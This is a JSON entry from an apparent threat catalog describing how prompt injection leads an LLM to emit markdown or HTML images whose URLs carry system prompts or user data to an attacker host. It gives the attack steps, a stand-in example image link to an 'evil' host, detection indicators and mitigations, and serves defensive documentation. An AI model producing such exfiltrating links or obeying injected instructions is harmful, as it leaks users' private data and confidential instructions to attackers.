{
  "$schema": "../schema.json",
  "exploit_id": "AML.T0077",
  "title": "LLM Response Rendering — markdown/HTML image exfiltration",
  "description": "An adversary causes the LLM to emit a response that, when rendered by the user's client, automatically issues an HTTP request to an attacker-controlled host with sensitive data embedded as query parameters. The canonical form is a markdown image (`![alt](https://evil/?secret=...)`) the client renders without user interaction. Variants include HTML img tags, audio/video src attributes, and reference-style markdown that defeats naive link redaction. Confirmed in production against Microsoft Copilot, Google Gemini, Sourcegraph Amp, and VS Code Continue.",
  "target_component": "agent_framework",
  "dsgai_mapping": ["DSGAI01", "DSGAI15", "DSGAI16"],
  "mitre_atlas_mapping": ["AML.T0077"],
  "owasp_llm_top10_mapping": ["LLM02:2025", "LLM05:2025"],
  "attack_steps": [
    "Combine with prompt injection (AML.T0051) to coerce the LLM into producing the target response shape.",
    "Embed the to-be-exfiltrated content (system prompt, retrieved context, user data) as query parameters or path segments of an attacker-controlled URL.",
    "Render the URL inside a markdown image or HTML element that the user's client auto-fetches on display.",
    "The client browser issues the request; the attacker reads the exfiltrated content from server access logs."
  ],
  "prerequisites": [
    "An LLM-injection foothold or output-control vector that lets the attacker influence the response payload.",
    "A client UI that auto-renders external resources (markdown image, HTML img, embedded media)."
  ],
  "impact": [
    "data_exfiltration",
    "system_prompt_disclosure",
    "cross_tenant_disclosure"
  ],
  "detection_indicators": [
    "Markdown image or HTML img tags in model output pointing to unfamiliar external hosts.",
    "Long URL query strings in rendered links/images.",
    "Outbound requests from client renderers to non-allowlisted domains immediately after LLM responses."
  ],
  "severity": {
    "qualitative": "Critical"
  },
  "source_urls": [
    "https://atlas.mitre.org/techniques/AML.T0077",
    "https://embracethered.com/blog/posts/2023/data-exfiltration-in-azure-openai-playground-fixed/"
  ],
  "date_documented": "2024-05-09",
  "date_added": "2026-05-18",
  "disclosure_status": "atlas_catalog",
  "exploited_in_the_wild": "yes",
  "mitigations": [
    "Disable auto-rendering of external markdown images and HTML media in any AI-assistant UI surface.",
    "Allowlist egress domains for rendered links; strip query parameters from URLs in LLM output before display.",
    "Tighten Content Security Policy (CSP) on the assistant's UI; do not allow image-src to wildcard hosts.",
    "Render LLM output as plain text or sanitized markdown by default; require user-initiated rendering for external resources."
  ],
  "related_vulnerabilities": [
    "CVE-2025-32711",
    "DSGAI-VULN-2024-slack-ai-indirect-prompt-injection",
    "DSGAI-VULN-2025-gitlab-duo-prompt-injection"
  ],
  "tags": ["data-exfiltration", "markdown-image", "rendering-attack", "zero-click"]
}
